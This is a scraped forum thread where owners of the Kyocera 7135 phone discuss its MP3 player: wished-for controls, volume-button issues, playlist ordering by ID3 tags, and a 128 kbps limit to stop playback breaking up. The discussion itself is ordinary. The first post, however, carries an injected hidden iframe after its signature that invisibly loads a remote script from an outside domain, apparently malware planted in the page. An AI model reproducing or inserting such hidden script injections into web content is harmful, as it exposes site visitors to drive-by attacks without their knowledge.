+ Reply to Thread
Page 1 of 2 1 2 LastLast

Improvements to MP3 play on 7135

While I think it is great that the 7135 has MP3 playing capabilities, I think there is room for improvement, especially when it comes to control of the MP3 player. Perhaps I am just spoiled but having a remote with my Sony CLIE made control of the MP3 player far superior to that which I am experiencing with my 7135.

I'd like to see two things:

1) A hack that allows one to bring up a small MP3 play window from within any application to control the based MP3 player functions (i.e start, stop, volume, etc.).

2) Some sort of hack that will allow one to start and stop the MP3 player with the button on the stereo headset. It's great that one can control the volume of the MP3 player without opening the flip (by using the volume keys on the left side of the phone) but what about starting and stopping play in general?

Comments?

Andrew<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

nah, it's good for me as a MP3 player on a phone.....

i'd be happy with two enhanements.
    1. organize by artist/album
    2. multiple play lists like jazz, rock

Re: Improvements to MP3 play on 7135

Originally posted by dreamwave6
    While I think it is great that the 7135 has MP3 playing capabilities, I think there is room for improvement, especially when it comes to control of the MP3 player. Perhaps I am just spoiled but having a remote with my Sony CLIE made control of the MP3 player far superior to that which I am experiencing with my 7135.

I'd like to see two things:

1) A hack that allows one to bring up a small MP3 play window from within any application to control the based MP3 player functions (i.e start, stop, volume, etc.).

2) Some sort of hack that will allow one to start and stop the MP3 player with the button on the stereo headset. It's great that one can control the volume of the MP3 player without opening the flip (by using the volume keys on the left side of the phone) but what about starting and stopping play in general?

Comments?

Andrew

I think that item number two is a very good idea (actually, that is one of the best things that I have seen posted here in a long time), this is something that kyocera should have done from the start.

Thanks dreamwave6,
    I hope that this is implemented.

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar

Re: Re: Improvements to MP3 play on 7135

Originally posted by imz14u2nv
    I think that item number two is a very good idea (actually, that is one of the best things that I have seen posted here in a long time), this is something that kyocera should have done from the start.
    Agreed! When the 7135 SDK comes out, I'll be happy to work on it!
    -M
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

just my 2 cents

i'd like to see rewind/fast forward capability (not simply 'rewind to beginning/fast forward to next track' like it currently has). I listen to 1-2 hour long mp3 files (talk radio shows encoded at VERY low rates) and this would greatly assist. Being able to slide the "progress indicator" back and forth to a desired point would also be a definite plus.

Mind you I'm not complaining. The fact that the MP3 Player app gives you a choice of displaying elapsed time OR time remaining in a track shows someone was thinking about these sort of things...

Just FYI, among its other functions, Kinoma Producer (which costs $29.99) will let you convert MP3's to Kinoma format. You can then use the Kinoma Player which is a little more flexible than the 7135's MP3 player, allowing you to jump forwards or backwards within a file. Kinoma Producer also lets you put "chapters" within a file, bookmarking jump points. Probably more effort and expense than most of us would endure, but it would seem to meet Bones Boy's needs.

I have Kinome Producer, and did not ever consider that. Thanks for the tip!! Guess what I'm off to do right now?

poked back in
    Question about the mp3 player. If I put continuous mix mp3s together on it, will I hear a click when the track changes? Or something to ruin the complete file-but-broken-up experience?

Edit:
    I ask this hear, because this seems to be a good suggestions thread. And if it can't be done seemlessly NOW, a hack could be written to pre-load data, right?

Volume control?

Dreamwave6 said in an earlier post that you can control the MP3 volume with the flip closed, using the volume buttons on the left side of phone. Do I have to do anything to enable this? It doesn't seem to be working for me...the only way I can adjust volume is within MP3 player itself which is a pain.

Re: Volume control?

Originally posted by davidb
    Dreamwave6 said in an earlier post that you can control the MP3 volume with the flip closed, using the volume buttons on the left side of phone. Do I have to do anything to enable this? It doesn't seem to be working for me...the only way I can adjust volume is within MP3 player itself which is a pain.
    You are not alone, I tried it with and without the kyo headphones and no luck. The only way I can adjust the volume is to open the flip, go to the mp3 player and change it. This seems odd as I just got a phone call while listening to the mp3 player. When I was on the phone I could adjust the earpiece volume, hmmmm.

Also, have you noticed how it arranges the songs in the playlist? It seams to be somewhat random for me, it is certainly not in alphabetical order.

As others have said however, its a good mp3 player for a phone!

Re: Re: Volume control?

[QUOTE][i]Originally posted by boinker
    Also, have you noticed how it arranges the songs in the playlist? It seams to be somewhat random for me, it is certainly not in alphabetical order.

I used the Easy CD Creator suggested in another link. It puts the track number in front of the name and so they all appear numerically by album.

01. Blue Light, Red Light
    02. A Blessing and a Curse

My MP3 files won't play without continuously "breaking up". It's not the headphones, 'cause I tried playing through the speaker as well. All files were loaded using provided software. Anyone else having problems?

thay cannot be encoded any higher than 128kbps otherwise they will breakup
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Originally posted by Byrd Dog
    thay cannot be encoded any higher than 128kbps otherwise they will breakup
    A Hah!! Sounds like a solution. I'll reload when I get back to work. Thanks Byrd Dog!!

Software

how do you easily unistall software?

Re: Re: Re: Volume control?

[QUOTE]Originally posted by pdageek
    [i]I used the Easy CD Creator suggested in another link. It puts the track number in front of the name and so they all appear numerically by album.

01. Blue Light, Red Light
    02. A Blessing and a Curse
    I am using CDex and I can and have changed the names so the number is first. When I look in FileManager or if I look at the SD card from my computer they are organized great. When I go into the mp3 player the same song always comes up first and the order is somewhat random? I have deleted the playlist a few times, checked the names for a space etc... and no luck. Its not a big deal but I filled my 256 mb sd with mp3's so its hard to play 1 album. The convention I used for naming them is XX ArtistYY.mp3 where xx is a number starting at 01 for the first cd I converted and each one is incremented. Then yy is the track number on the CD. Any help would be apreciated, thanks.

Re: Re: Re: Re: Volume control?

Originally posted by boinker
    I am using CDex and I can and have changed the names so the number is first. When I look in FileManager or if I look at the SD card from my computer they are organized great. When I go into the mp3 player the same song always comes up first and the order is somewhat random? I have deleted the playlist a few times, checked the names for a space etc... and no luck. Its not a big deal but I filled my 256 mb sd with mp3's so its hard to play 1 album. The convention I used for naming them is XX ArtistYY.mp3 where xx is a number starting at 01 for the first cd I converted and each one is incremented. Then yy is the track number on the CD. Any help would be apreciated, thanks.
    The 7135 player uses the ID3 tag to sort files, not the filename.. (an Id3 tag is a header insider the mp3 file with the song information)

Perform a google search for Id3 renamer, and you can find some software that will create/update the Id3 tags using the Filename info. Good luck.
    iPhone therefore iAm.

Re: Re: Re: Re: Re: Volume control?

Originally posted by Steve
    The 7135 player uses the ID3 tag to sort files, not the filename.. (an Id3 tag is a header insider the mp3 file with the song information)

Perform a google search for Id3 renamer, and you can find some software that will create/update the Id3 tags using the Filename info. Good luck.
    It doesn't sort by ID3 title either. I used a utility to change the ID3 name to the same as the file name on a bunch of MP3's, and it still installed them in semi-random order.

Alan

anyone figure out how to enable using the volume buttons as such with the mp3 player? I know it seems to just work on some, but not mine.